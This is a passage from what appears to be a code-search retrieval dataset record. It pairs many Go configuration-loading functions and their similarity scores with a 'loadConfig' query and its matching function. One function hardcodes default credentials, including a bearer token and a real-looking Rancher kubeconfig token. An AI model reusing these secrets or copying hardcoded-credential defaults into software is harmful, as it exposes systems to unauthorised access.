base64.StdEncoding.EncodeToString([]byte(user + \":\" + pass))\n\t}\n\treturn &Config{BaseURL: baseURL, secret: secret}\n}", "func NewConfig(listen, raftDir, raftPort, nodeID string, join string) *Config {\n\treturn &Config{\n\t\tListenAddress: listen,\n\t\tRaftDir: raftDir,\n\t\tRaftPort: raftPort,\n\t\tJoin: join,\n\t\tNodeID: nodeID,\n\t}\n}", "func NewConfig(data map[string]string) (settings *Config) {\n cfg := &Config{\n ConsumerKey: data[\"consumer_key\"],\n ConsumerSecret: data[\"consumer_secret\"],\n }\n\n // save access token if defined\n if atoken, ok := data[\"access_token\"]; ok {\n cfg.AccessToken = atoken\n }\n\n // save access token secret if defined\n if asecret, ok := data[\"access_secret\"]; ok {\n cfg.AccessSecret = asecret\n }\n\n // save debug flag if defined\n if debug, ok := data[\"debug\"]; ok && debug == \"on\" {\n cfg.Debug = true\n }\n\n return cfg\n}", "func NewConfig(c *v2.ServerConfig) *Config {\n\treturn &Config{\n\t\tServerName: c.ServerName,\n\t\tLogPath: c.DefaultLogPath,\n\t\tLogLevel: configmanager.ParseLogLevel(c.DefaultLogLevel),\n\t\tLogRoller: c.GlobalLogRoller,\n\t\tGracefulTimeout: c.GracefulTimeout.Duration,\n\t\tUseNetpollMode: c.UseNetpollMode,\n\t}\n}", "func loadConfig() {\n\toldUploadKeys = newUploadKeys\n\tuploadKeys = &oldUploadKeys\n\toldConfig = newConfig\n\tconfig = &oldConfig\n\tnewConfig = defaultConfig\n\n\t// populate with values from config file\n\tconfigBytes, err := ioutil.ReadFile(*configPath)\n\tif os.IsNotExist(err) {\n\t\t// don't continue if file doesn't exist\n\t} else if err != nil {\n\t\tlog.Printf(\"error loading config file: %v\", err)\n\t} else {\n\t\tif err := json.Unmarshal(configBytes, &newConfig); err != nil {\n\t\t\tlog.Printf(\"error parsing config file: %v\", err)\n\t\t}\n\t}\n\n\t// apply values from flags\n\tif *listenAddr != \"\" {\n\t\tnewConfig.ListenAddr = *listenAddr\n\t}\n\tif *uploadPath != \"\" {\n\t\tnewConfig.UploadPath = *uploadPath\n\t}\n\tif *uploadURL != \"\" {\n\t\tnewConfig.UploadURL = *uploadURL\n\t}\n\tif *remoteAddrHeader != \"\" {\n\t\tnewConfig.RemoteAddrHeader = *remoteAddrHeader\n\t}\n\n\t// just making config.Keys is initialized\n\tif newConfig.Keys == nil {\n\t\tnewConfig.Keys = make(map[string]string)\n\t}\n\n\tnewUploadKeys = make(map[string]bool)\n\n\tuploadKeyEnv := os.Getenv(\"UPLOAD_KEY\")\n\tif uploadKeyEnv != \"\" {\n\t\tenvKeys := strings.Split(uploadKeyEnv, \",\")\n\t\tfor _, key := range envKeys {\n\t\t\tnewUploadKeys[key] = true\n\t\t}\n\t}\n\n\tfor key := range newConfig.Keys {\n\t\tnewUploadKeys[key] = true\n\t}\n\n\tuploadKeys = &newUploadKeys\n\tconfig = &newConfig\n}", "func newRestConfig(apiConfig *api.Config, overrides clientcmd.ConfigOverrides) (*rest.Config, error) {\n\treturn clientcmd.NewDefaultClientConfig(*apiConfig, &overrides).ClientConfig()\n}", "func newDatabaseConfig() *databaseConfig {\n\treturn &databaseConfig {\n\t\thost: viper.GetString(\"DB_HOST\"),\n\t\tport: getIntOrPanic(\"DB_PORT\"),\n\t\tname: viper.GetString(\"DB_NAME\"),\n\t\tusername: viper.GetString(\"DB_USER\"),\n\t\tpassword: viper.GetString(\"DB_PASSWORD\"),\n\t\tmaxPoolSize: getIntOrPanic(\"DB_POOL\"),\n\t}\n}", "func (client *HTTPClient) NewConfig(config *Config) {\n\tclient.sendRequest(\"POST\", config, nil, &HTTPClientMetrics{NewConfig: true})\n}", "func createDefaultConfig() component.Config {\n\treturn &Config{\n\t\tProtocols: Protocols{\n\t\t\tGRPC: &configgrpc.GRPCServerSettings{\n\t\t\t\tNetAddr: confignet.NetAddr{\n\t\t\t\t\tEndpoint: defaultGRPCEndpoint,\n\t\t\t\t\tTransport: \"tcp\",\n\t\t\t\t},\n\t\t\t\t// We almost write 0 bytes, so no need to tune WriteBufferSize.\n\t\t\t\tReadBufferSize: 512 * 1024,\n\t\t\t},\n\t\t\tHTTP: &HTTPConfig{\n\t\t\t\tHTTPServerSettings: &confighttp.HTTPServerSettings{\n\t\t\t\t\tEndpoint: defaultHTTPEndpoint,\n\t\t\t\t},\n\t\t\t\tTracesURLPath: defaultTracesURLPath,\n\t\t\t\tMetricsURLPath: defaultMetricsURLPath,\n\t\t\t\tLogsURLPath: defaultLogsURLPath,\n\t\t\t},\n\t\t},\n\t}\n}", "func testNewConfigWithDefaults(in *Config) *Config {\n\tcfg := NewConfig()\n\tcfg.Name = in.Name\n\tcfg.ClusterName = in.ClusterName\n\tcfg.InitialCluster = in.InitialCluster\n\tcfg.InitialClusterToken = in.InitialClusterToken\n\tcfg.Dir = in.Dir\n\tcfg.PeerAutoTLS = in.PeerAutoTLS\n\tcfg.PeerTLSInfo = in.PeerTLSInfo\n\tcfg.LPUrls = in.LPUrls\n\tcfg.APUrls = in.APUrls\n\tcfg.ClientAutoTLS = in.ClientAutoTLS\n\tcfg.ClientTLSInfo = in.ClientTLSInfo\n\tcfg.LCUrls = in.LCUrls\n\tcfg.ACUrls = in.ACUrls\n\tcfg.Metrics = in.Metrics\n\tcfg.ListenMetricsUrls = in.ListenMetricsUrls\n\tcfg.ClusterState = in.ClusterState\n\treturn cfg\n}", "func initConfig() {\n\tif cfgFile != \"\" {\n\t\t// Use config file from the flag.\n\t\tviper.SetConfigFile(cfgFile)\n\t} else {\n\t\t// Find home directory.\n\t\thome, err := homedir.Dir()\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\t// Search config in home directory with name \".gotsumon\" (without extension).\n\t\tviper.AddConfigPath(home)\n\t\tviper.SetConfigName(fmt.Sprintf(\".%s\", appName))\n\t}\n\n\trep := strings.NewReplacer(\".\", \"_\", \"-\", \"_\")\n\tviper.SetEnvKeyReplacer(rep)\n\tviper.SetEnvPrefix(appName)\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tfmt.Println(\"Using config file:\", viper.ConfigFileUsed())\n\t}\n}", "func newConfig(path string) *Config {\n\tfile, e := ioutil.ReadFile(path)\n\tif e != nil {\n\t\tlog.Fatalf(\"config error: %v\", e)\n\t}\n\tvar cfg Config\n\te = json.Unmarshal(file, &cfg)\n\tif e != nil {\n\t\tlog.Fatalf(\"config error: %v\", e)\n\t}\n\n\t// redirect logging to a file\n\twriter, err := os.OpenFile(\"gorobot.log\", os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0644)\n\tif err != nil {\n\t\tlog.Fatalf(\"Unable to open file log: %v\", err)\n\t}\n\tlog.SetOutput(writer)\n\treturn &cfg\n}", "func NewConfig() Config {\n\treturn Config{\n\t\tBindAddress: DefaultBindAddress,\n\t\tDatabase: DefaultDatabase,\n\t\tProtocol: DefaultProtocol,\n\t\tNamePosition: DefaultNamePosition,\n\t\tNameSeparator: DefaultNameSeparator,\n\t\tConsistencyLevel: DefaultConsistencyLevel,\n\t}\n}", "func initConfig() {\n\tvp := viper.New()\n\tif cfgFile != \"\" {\n\t\t// Use vp file from the flag.\n\t\tvp.SetConfigFile(cfgFile)\n\t} else {\n\t\t// Find home directory.\n\t\tvp.SetConfigType(\"yaml\")\n\t\tvp.AddConfigPath(\"/etc/canis/\")\n\t\tvp.AddConfigPath(\"./config/docker/\")\n\t\tvp.SetConfigName(\"steward_config\")\n\t}\n\n\tvp.AutomaticEnv() // read in environment variables that match\n\t_ = vp.BindPFlags(pflag.CommandLine)\n\n\t// If a vp file is found, read it in.\n\tif err := vp.ReadInConfig(); err != nil {\n\t\tfmt.Println(\"unable to read vp:\", vp.ConfigFileUsed(), err)\n\t\tos.Exit(1)\n\t}\n\n\tctx = context.NewProvider(vp)\n}", "func initConfig() {\n\tif cfgFile == \"\" {\n\t\t// Use default.\n\t\tcfgFile = filepath.Join(os.Getenv(\"HOME\"), util.ConfigFileName)\n\t}\n\tviper.SetConfigFile(cfgFile)\n\n\tviper.AutomaticEnv()\n\n\tviper.SetDefault(util.SettingServer, util.DefaultAPIServer)\n\n\terr := viper.ReadInConfig()\n\tif err == nil {\n\t\tfmt.Println(\"[alauda] Using config file:\", viper.ConfigFileUsed())\n\t} else {\n\t\tfmt.Println(\"[alauda] WARNING: Unable to read config file:\", cfgFile)\n\t}\n}", "func initConfig() {\n\tlogger.SetLogLevel(viper.GetString(\"log.level\"))\n\n\t// Find home directory.\n\thome, err := homedir.Dir()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n\n\tif cfgFile != \"\" {\n\t\t// Use config file from the flag.\n\t\tviper.SetConfigFile(cfgFile)\n\t} else {\n\t\t// Search config in home directory or current directory with name \".box\" (without extension).\n\t\tviper.AddConfigPath(home)\n\t\tviper.AddConfigPath(\".\")\n\t\tviper.SetConfigName(\".box\")\n\t}\n\n\tviper.SetEnvPrefix(\"box\")\n\tviper.SetEnvKeyReplacer(strings.NewReplacer(\"_\", \".\"))\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\tviper.SetDefault(\"workspace\", path.Join(home, \".boxd\"))\n\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tlogger.Infof(\"Using config file: %s\", viper.ConfigFileUsed())\n\t}\n}", "func newConfigDirectory(baseDirectory string) *configDirectory {\n\treturn &configDirectory{nil, baseDirectory, make([]string, 0)}\n}", "func initConfig() {\n\n\tif ver {\n\t\t_, err := fmt.Fprintln(os.Stdout, formatVersion(version.New(), false))\n\t\tif err != nil {\n\t\t\tlogrus.Fatal(err)\n\t\t}\n\n\t\tos.Exit(0)\n\t}\n\n\tif configFile != \"\" { // enable ability to specify config file via flag\n\t\tviper.SetConfigFile(configFile)\n\t}\n\n\tviper.SetConfigName(\"apphc\") // name of config file (without extension)\n\tviper.AddConfigPath(\"/opt/cisco/apphc/config\")\n\tviper.AddConfigPath(appcommon.ApphcHomePath) // adding home directory as first search path\n\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err != nil {\n\t\tlogrus.Fatal(err)\n\t}\n\n\tlogrus.Info(\"Config file: \", viper.ConfigFileUsed())\n\n\t// Set prefix for environment variables\n\t// It will check for a environment variable with a name matching the key\n\t// uppercased and prefixed with the EnvPrefix if set.\n\tviper.SetEnvPrefix(\"apphc\")\n\n\t// Bind keys to appropriate environment variables\n\terr := viper.BindEnv(appcommon.EnvApphcLogFormat,\n\t\tappcommon.EnvApphSvcsUrlExternalIp,\n\t\tappcommon.EnvApphExternalIp,\n\t\tappcommon.EnvApphcNetworkPort,\n\t\tappcommon.EnvApphcCachePath,\n\t\tappcommon.EnvApphcAppsUpgradePolicyRecreate,\n\t\tappcommon.EnvApphcAppsRollbackEnabled,\n\t\tappcommon.EnvApphcInternalAuthorizationEnabled,\n\t\tappcommon.EnvApphcBearerToken,\n\t\tappcommon.EnvApphcPrivateDockerRegistry,\n\t\tappcommon.EnvApphcAppFlexApiHost,\n\t\tappcommon.EnvApphcAppFlexApiPort,\n\t\tappcommon.EnvApphcAdaptersRancherEnabled,\n\t\tappcommon.EnvApphMasterNodeUser,\n\t\tappcommon.EnvApphMasterNodeIp,\n\t\tappcommon.EnvApphcPurgeAppMetadata,\n\t\trancher.EnvApphcAdaptersRancherClusterName,\n\t\trancher.EnvApphcAdaptersRancherServerEndpoint,\n\t\trancher.EnvApphcAdaptersRancherServerCredsToken,\n\t\trancher.EnvApphcAdaptersRancherCatalogProto,\n\t\trancher.EnvApphcAdaptersRancherCatalogPassword,\n\t\trancher.EnvApphcAdaptersRancherTemplatesCatalogBranch,\n\t\trancher.EnvApphcAdaptersRancherAppsCatalogName,\n\t\trancher.EnvApphcAdaptersRancherAppsCatalogBranch)\n\n\tif err != nil {\n\t\tlogrus.Fatal(err)\n\t}\n\n\t// Set default values\n\tviper.SetDefault(appcommon.EnvApphcLogFormat, appcommon.LogFormatText)\n\tviper.SetDefault(appcommon.EnvApphcNetworkPort, 10000)\n\tviper.SetDefault(appcommon.EnvApphcCachePath, \"/tmp/.cache\")\n\tviper.SetDefault(appcommon.EnvApphcAppsUpgradePolicyRecreate, true)\n\tviper.SetDefault(appcommon.EnvApphcAppsRollbackEnabled, true)\n\tviper.SetDefault(appcommon.EnvApphcInternalAuthorizationEnabled, true)\n\tviper.SetDefault(appcommon.EnvApphcBearerToken, \"YXBwaG9zdGVyLWRlcGxveWVyLTIwMTgK\") // apphoster-deployer-2018 in base64\n\tviper.SetDefault(appcommon.EnvApphcAdaptersRancherEnabled, true)\n\tviper.SetDefault(appcommon.EnvApphMasterNodeUser, \"intucell\")\n\tviper.SetDefault(appcommon.EnvApphcAppFlexApiPort, 7000)\n\tviper.SetDefault(appcommon.EnvApphcPurgeAppMetadata, true)\n\tviper.SetDefault(rancher.EnvApphcAdaptersRancherClusterName, \"apphoster\")\n\tviper.SetDefault(rancher.EnvApphcAdaptersRancherCatalogProto, \"http\")\n\tviper.SetDefault(rancher.EnvApphcAdaptersRancherCatalogPassword, \"catalog\")\n\tviper.SetDefault(rancher.EnvApphcAdaptersRancherTemplatesCatalogBranch, \"master\")\n\tviper.SetDefault(rancher.EnvApphcAdaptersRancherAppsCatalogName, \"son-flex-apps\")\n\tviper.SetDefault(rancher.EnvApphcAdaptersRancherAppsCatalogBranch, \"master\")\n\tviper.SetDefault(rancher.EnvApphcAdaptersRancherServerCredsToken, \"kubeconfig-user-vxg8h:rf94p78gx2mk9fbmchvq7r9xbmzphhz42pltpskj2q8rdsf626n2sf\")\n\tviper.AutomaticEnv()\n\n\tvar formatter logrus.Formatter\n\tif viper.Get(appcommon.EnvApphcLogFormat).(appcommon.LogFormat) == appcommon.LogFormatJson {\n\t\tformatter = &logrus.JSONFormatter{}\n\t} else if viper.Get(appcommon.EnvApphcLogFormat).(appcommon.LogFormat) == appcommon.LogFormatText {\n\t\tformatter = &logrus.TextFormatter{}\n\t}\n\n\tlogrus.SetFormatter(formatter)\n\n\t// Set debug level\n\tif levelDebug {\n\t\tlogrus.SetLevel(logrus.DebugLevel)\n\t}\n\n\tverification()\n}", "func NewConfig() *Config {\n\treturn &Config{\n\t\tinjectString: defaultInject,\n\t\tconfigString: defaultConfig,\n\t\tactivateES: false,\n\t}\n}", "func initConfig() {\n\tviper.BindEnv(\"CNI_CONF_NAME\")\n\tviper.BindEnv(\"CNI_ETC_DIR\")\n\tviper.BindEnv(\"CNI_BIN_DIR\")\n\tviper.BindEnv(\"COIL_PATH\")\n\tviper.BindEnv(\"CNI_NETCONF_FILE\")\n\tviper.BindEnv(\"CNI_NETCONF\")\n\tviper.BindEnv(\"COIL_BOOT_TAINT\")\n\n\tviper.SetDefault(\"CNI_CONF_NAME\", defaultCniConfName)\n\tviper.SetDefault(\"CNI_ETC_DIR\", defaultCniEtcDir)\n\tviper.SetDefault(\"CNI_BIN_DIR\", defaultCniBinDir)\n\tviper.SetDefault(\"COIL_PATH\", defaultCoilPath)\n}", "func initConfig() {\n\n\tif Verbose {\n\t\tcli.Debug = true\n\t\tlog.SetLevel(log.DebugLevel)\n\t} else {\n\t\tlog.SetLevel(log.InfoLevel)\n\t}\n\tif cfgFile != \"\" { // enable ability to specify config file via flag\n\t\tviper.SetConfigFile(cfgFile)\n\t}\n\tif DryRun {\n\t\tcli.DryRun = true\n\t}\n\n\tviper.SetConfigType(\"yaml\")\n\tviper.SetConfigName(\".mongo-sync\") // name of config file (without extension)\n\tviper.AddConfigPath(\"./\") // search in current working directory first\n\tviper.AddConfigPath(\"$HOME\") // adding home directory as second search path\n\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tlog.Debugf(\"Using config file:%s\", viper.ConfigFileUsed())\n\t}\n\tviper.Unmarshal(&Config)\n\n\tif val, _ := RootCmd.Flags().GetString(\"local.database\"); val != \"\" {\n\t\tConfig.Local.Database, _ = RootCmd.Flags().GetString(\"local.database\")\n\t}\n\tif val, _ := RootCmd.Flags().GetString(\"local.host\"); val != \"\" {\n\t\tConfig.Local.Host, _ = RootCmd.Flags().GetString(\"local.host\")\n\t}\n\n\tif val, _ := RootCmd.Flags().GetInt(\"local.port\"); val > 0 {\n\t\tConfig.Local.Port, _ = RootCmd.Flags().GetInt(\"local.port\")\n\t}\n\n\tif val, _ := RootCmd.Flags().GetString(\"remote.database\"); val != \"\" {\n\t\tConfig.Remote.Database, _ = RootCmd.Flags().GetString(\"remote.database\")\n\t}\n\n\tif val, _ := RootCmd.Flags().GetString(\"remote.host\"); val != \"\" {\n\t\tConfig.Remote.Host, _ = RootCmd.Flags().GetString(\"remote.host\")\n\t}\n\n\tif val, _ := RootCmd.Flags().GetInt(\"remote.port\"); val > 0 {\n\t\tConfig.Remote.Port, _ = RootCmd.Flags().GetInt(\"remote.port\")\n\t}\n\n\tif Config.Local.Port == 0 {\n\t\tConfig.Local.Port = 27017\n\t}\n\n\tif Config.Remote.Port == 0 {\n\t\tConfig.Remote.Port = 27017\n\t}\n\n}", "func NewServerConfig(hbInfo *HeartbeatInfo, opc, dpc, aspID, tmt, nwApr, corrID uint32, rtCtxs []uint32, si, ni, mp, sls uint8) *Config {\n\treturn &Config{\n\t\tHeartbeatInfo: hbInfo,\n\t\tAspIdentifier: params.NewAspIdentifier(aspID),\n\t\tTrafficModeType: params.NewTrafficModeType(tmt),\n\t\tNetworkAppearance: params.NewNetworkAppearance(nwApr),\n\t\tRoutingContexts: params.NewRoutingContext(rtCtxs...),\n\t\tCorrelationID: params.NewCorrelationID(corrID),\n\t\tOriginatingPointCode: opc,\n\t\tDestinationPointCode: dpc,\n\t\tServiceIndicator: si,\n\t\tNetworkIndicator: ni,\n\t\tMessagePriority: mp,\n\t\tSignalingLinkSelection: sls,\n\t}\n}", "func newConfig() *config {\n\t/*According to Liqo Agent installation process, first check if\n\tuser has defined XDG_DATA_HOME env variable. Otherwise, use the\n\tfallback directory according to XDG specifications\n\t(www.freedesktop.com)*/\n\tXDGBaseDir, present := os.LookupEnv(\"XDG_DATA_HOME\")\n\tif !present {\n\t\tXDGBaseDir = filepath.Join(os.Getenv(\"HOME\"), \".local/share\")\n\t}\n\tliqoPath := filepath.Join(XDGBaseDir, \"liqo\")\n\tif err := os.Setenv(client.EnvLiqoPath, liqoPath); err != nil {\n\t\tos.Exit(1)\n\t}\n\tconf := &config{notifyLevel: NotifyLevelMax, notifyIconPath: filepath.Join(liqoPath, \"icons\")}\n\tconf.notifyTranslateMap = make(map[NotifyLevel]string)\n\tconf.notifyTranslateReverseMap = make(map[string]NotifyLevel)\n\tconf.notifyTranslateMap[NotifyLevelOff] = NotifyLevelOffDescription\n\tconf.notifyTranslateMap[NotifyLevelMin] = NotifyLevelMinDescription\n\tconf.notifyTranslateMap[NotifyLevelMax] = NotifyLevelMaxDescription\n\tfor k, v := range conf.notifyTranslateMap {\n\t\tconf.notifyTranslateReverseMap[v] = k\n\t}\n\treturn conf\n}", "func initConfig() {\n\n\tvar (\n\t\tconfigFile string\n\t\tconfigFileEnv string\n\t\tconfigFileEnvPresent bool\n\t\tconfigFileOrigin string\n\t)\n\n\t// If environment variable is set, load its value.\n\tconfigFileEnv, configFileEnvPresent = os.LookupEnv(\"MH_CONFIG\")\n\tif configFileEnvPresent {\n\t\tconfigFile = configFileEnv\n\t\tconfigFileOrigin = \"env\"\n\t}\n\tif configFileFlag != \"\" {\n\t\t// If flag isn't empty, load its value instead.\n\t\tconfigFile = configFileFlag\n\t\tconfigFileOrigin = \"flag\"\n\t}\n\tviper.SetConfigFile(configFile)\n\tviper.SetEnvPrefix(\"mh\") // will be uppercased automatically\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\t// If a configFile is found, read it in.\n\terr := viper.ReadInConfig()\n\tif viper.GetBool(\"json\") {\n\t\tlog.SetFormatter(&log.JSONFormatter{})\n\t}\n\tif err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"configFile\": configFile,\n\t\t\t\"configFileEnv\": configFileEnv,\n\t\t\t\"configFileEnvPresent\": configFileEnvPresent,\n\t\t\t\"configFileFlag\": configFileFlag,\n\t\t\t\"configFileOrigin\": configFileOrigin,\n\t\t\t\"configFileUsed\": viper.ConfigFileUsed(),\n\t\t\t\"err\": err,\n\t\t}).Warnln(\"Failed to load mh config.\",\n\t\t\t\"Please consider exporting environment variable: MH_CONFIG.\")\n\t}\n}", "func initConfig() {\n\tif privateKey != \"\" {\n\t\t// Use config file from the flag.\n\t\tviper.SetConfigFile(privateKey)\n\t} else {\n\t\t// Find home directory.\n\t\thome, err := homedir.Dir()\n\t\tcobra.CheckErr(err)\n\n\t\t// Search config in home directory with name \".gitserve\" (without extension).\n\t\tviper.AddConfigPath(home)\n\t\tviper.SetConfigName(\".gitserve\")\n\t}\n\n\tviper.AutomaticEnv() // read in environment variables that match\n\n\t// If a config file is found, read it in.\n\tif err := viper.ReadInConfig(); err == nil {\n\t\tfmt.Fprintln(os.Stderr, \"Using config file:\", viper.ConfigFileUsed())\n\t}\n}", "func (bs *BusinessServer) initConfig() {\n\tcfg := config{}\n\tviper, err := cfg.init(bs.setting.Configfile)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tbs.viper = viper\n}", "func (sm *ShardMaster) CreateNewConfig() *Config{\n\t// get current config (the last config in config list)\n\tsz := len(sm.configs)\n\tcurr_config := &sm.configs[sz - 1]\n\n\t// create a new config\n\tnew_config := Config{Num: curr_config.Num + 1}\n\tnew_config.Groups = make(map[int64][]string)\n\n\t// copy the shards from curr_config\n\tfor s, gid := range curr_config.Shards{\n\t\tnew_config.Shards[s] = gid\n\t}\n\n\t// copy the group from curr_config\n\tfor gid, server := range curr_config.Groups{\n\t\tnew_config.Groups[gid] = server\n\t}\n\treturn &new_config\n}", "func New() (*Config, error) {\n\tflags := pflag.NewFlagSet(os.Args[0], pflag.ExitOnError)\n\tcfg := &Config{\n\t\tFlags: flags,\n\t\tHTTPAddr: flags.StringP(\"http-addr\", \"l\", \":8080\", \"http listen address\"),\n\t\tHTTPReadHeaderTimeout: flags.DurationP(\"http-timeout\", \"h\", 1*time.Second, \"http timeout for reading request headers\"),\n\t\tCallTimeout: flags.DurationP(\"call-timeout\", \"t\", 0*time.Second, \"function call timeout\"),\n\t\tReadLimit: flags.Int64(\"read-limit\", -1, \"limit the amount of data which can be contained in a requests body\"),\n\t\tFramer: flags.StringP(\"framer\", \"f\", \"\", \"afterburn framer to use: line, json or http\"),\n\t\tBuffer: flags.BoolP(\"buffer\", \"b\", false, \"buffer output before writing\"),\n\t}\n\tif err := cfg.parseCommandline(); err != nil {\n\t\treturn nil, err\n\t}\n\tif err := cfg.parseEnvironment(); err != nil {\n\t\treturn nil, err\n\t}\n\treturn cfg, nil\n}" ]
[ "0.73115087", "0.70333534", "0.69000286", "0.67219496", "0.6460424", "0.6443269", "0.6437713", "0.63716805", "0.6369636", "0.6347529", "0.63264453", "0.63229084", "0.6315524", "0.63034165", "0.6300839", "0.6279276", "0.6262298", "0.6255001", "0.6136349", "0.6126579", "0.61171925", "0.605729", "0.6018562", "0.6015699", "0.597547", "0.597091", "0.59661067", "0.59629816", "0.5959077", "0.5950047", "0.5912011", "0.5902696", "0.58952636", "0.58900225", "0.5880281", "0.58796656", "0.5878133", "0.5867786", "0.5866814", "0.58640176", "0.5853106", "0.5843002", "0.5836692", "0.58266747", "0.5813649", "0.5805457", "0.579691", "0.579225", "0.5790766", "0.57845104", "0.57775396", "0.5763751", "0.5754555", "0.5752975", "0.57509196", "0.5750882", "0.57492393", "0.57433116", "0.574206", "0.5739603", "0.5737488", "0.57344556", "0.57301414", "0.5729949", "0.5724323", "0.57228315", "0.57163477", "0.5710451", "0.5709872", "0.5706497", "0.5702733", "0.57012564", "0.5692789", "0.56887144", "0.56872696", "0.56829494", "0.56822854", "0.5681579", "0.5681088", "0.56808996", "0.56777877", "0.5669196", "0.56673336", "0.5666042", "0.566579", "0.5665107", "0.56606054", "0.56597495", "0.56592447", "0.565575", "0.5655352", "0.5653523", "0.56480044", "0.5642592", "0.5637331", "0.5634173", "0.5626404", "0.56253093", "0.5624893", "0.56225646" ]
0.8209749
0
loadConfig loads a new config from disk, overrides params from env if found and valid
func loadConfig(envParams envParams) error { configFile := getConfigFile() if _, err := os.Stat(configFile); err != nil { return err } srvCfg := &serverConfigV14{} qc, err := quick.New(srvCfg) if err != nil { return err } if err = qc.Load(configFile); err != nil { return err } // If env is set override the credentials from config file. if globalIsEnvCreds { srvCfg.SetCredential(envParams.creds) } if globalIsEnvBrowser { srvCfg.SetBrowser(envParams.browser) } if strings.ToLower(srvCfg.GetBrowser()) == "off" { globalIsBrowserEnabled = false } // hold the mutex lock before a new config is assigned. serverConfigMu.Lock() // Save the loaded config globally. serverConfig = srvCfg serverConfigMu.Unlock() if serverConfig.Version != v14 { return errors.New("Unsupported config version `" + serverConfig.Version + "`.") } return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func LoadConfig(logger *zap.Logger, cfg interface{}) {\n\terr := envconfig.Process(\"\", cfg)\n\tif err != nil {\n\t\tenvconfig.Usage(\"\", cfg)\n\t\tlogger.Fatal(\"app: could not process config\", zap.Error(err))\n\t}\n}", "func loadConfig() {\n\toldUploadKeys = newUploadKeys\n\tuploadKeys = &oldUploadKeys\n\toldConfig = newConfig\n\tconfig = &oldConfig\n\tnewConfig = defaultConfig\n\n\t// populate with values from config file\n\tconfigBytes, err := ioutil.ReadFile(*configPath)\n\tif os.IsNotExist(err) {\n\t\t// don't continue if file doesn't exist\n\t} else if err != nil {\n\t\tlog.Printf(\"error loading config file: %v\", err)\n\t} else {\n\t\tif err := json.Unmarshal(configBytes, &newConfig); err != nil {\n\t\t\tlog.Printf(\"error parsing config file: %v\", err)\n\t\t}\n\t}\n\n\t// apply values from flags\n\tif *listenAddr != \"\" {\n\t\tnewConfig.ListenAddr = *listenAddr\n\t}\n\tif *uploadPath != \"\" {\n\t\tnewConfig.UploadPath = *uploadPath\n\t}\n\tif *uploadURL != \"\" {\n\t\tnewConfig.UploadURL = *uploadURL\n\t}\n\tif *remoteAddrHeader != \"\" {\n\t\tnewConfig.RemoteAddrHeader = *remoteAddrHeader\n\t}\n\n\t// just making config.Keys is initialized\n\tif newConfig.Keys == nil {\n\t\tnewConfig.Keys = make(map[string]string)\n\t}\n\n\tnewUploadKeys = make(map[string]bool)\n\n\tuploadKeyEnv := os.Getenv(\"UPLOAD_KEY\")\n\tif uploadKeyEnv != \"\" {\n\t\tenvKeys := strings.Split(uploadKeyEnv, \",\")\n\t\tfor _, key := range envKeys {\n\t\t\tnewUploadKeys[key] = true\n\t\t}\n\t}\n\n\tfor key := range newConfig.Keys {\n\t\tnewUploadKeys[key] = true\n\t}\n\n\tuploadKeys = &newUploadKeys\n\tconfig = &newConfig\n}", "func (c *Config) LoadConfig() (err error) {\n\tpath := os.Getenv(envConfigPath)\n\tif path == \"\" {\n\t\tpath, err = os.Getwd()\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tif path == \"/\" {\n\t\t\tpath = \".\"\n\t\t}\n\t}\n\tc.path = path + \"/config.json\"\n\terr = LoadConfig(c.path, c)\n\tif err != nil {\n\t\tfmt.Println(\"LoadConfig err\", err)\n\t\treturn\n\t}\n\n\terr = c.overWrite()\n\n\treturn\n}", "func loadConfig(config *Config) {\n\t// Load path to config from CONFIGPATH environment variable\n\tconfigpath := os.Getenv(\"CONFIGPATH\")\n\tfmt.Println(\"Loading config.json from:\", configpath)\n\tfile, _ := os.Open(configpath)\n\tdecoder := json.NewDecoder(file)\n\terr := decoder.Decode(&config)\n\tif err != nil {\n\t\tlog.Fatal(\"Error loading config.json:\", err)\n\t}\n}", "func (c *Config) LoadConfig() (err error) {\n\tpath = os.Getenv(envConfigPath)\n\tif path == \"\" {\n\t\tpath, err = os.Getwd()\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tif path == \"/\" {\n\t\t\tpath = \".\"\n\t\t}\n\t}\n\tpath = path + \"/config.json\"\n\n\terr = LoadConfig(path, c)\n\tif err != nil {\n\t\tfmt.Println(\"LoadConfig err\", err)\n\t\treturn\n\t}\n\terr = c.overWrite()\n\n\treturn\n}", "func Load(env string) (Config, error) {\n\tconfig, err := configFromFile(env)\n\tif err != nil {\n\t\treturn config, err\n\t}\n\tconfig.Environment = env\n\n\t// override with environment variables as needed and accepted by `Config`\n\terr = envconfig.Init(&config)\n\tif err != nil {\n\t\treturn config, err\n\t}\n\n\treturn config, nil\n}", "func LoadConfig(configPath string) *models.Configuration {\r\n\r\n\tviper.SetEnvPrefix(\"EDUCATIVE\")\r\n\tviper.AddConfigPath(\".\")\r\n\tviper.SetConfigFile(configPath)\r\n\terr := viper.MergeInConfig()\r\n\tif err != nil {\r\n\t\tfmt.Println(\"Error in reading config\")\r\n\t\tpanic(err)\r\n\t}\r\n\r\n\terr = viper.Unmarshal(&CFG, func(config *mapstructure.DecoderConfig) {\r\n\t\tconfig.TagName = \"yaml\"\r\n\t})\r\n\tif err != nil {\r\n\t\tfmt.Println(\"Error in un-marshaling config\")\r\n\t\tpanic(err)\r\n\t}\r\n\t// fillBanningJobTime()\r\n\tif CFG.APP.LogLevel == \"info\" {\r\n\t\tfmt.Printf(\"%#v \\n\", CFG)\r\n\t}\r\n\r\n\tpostgres, err := GetPostgres()\r\n\tif err != nil {\r\n\t\tpanic(err)\r\n\t}\r\n\tutil.Initialize()\r\n\treturn &models.Configuration{\r\n\t\tPostgresConnection: 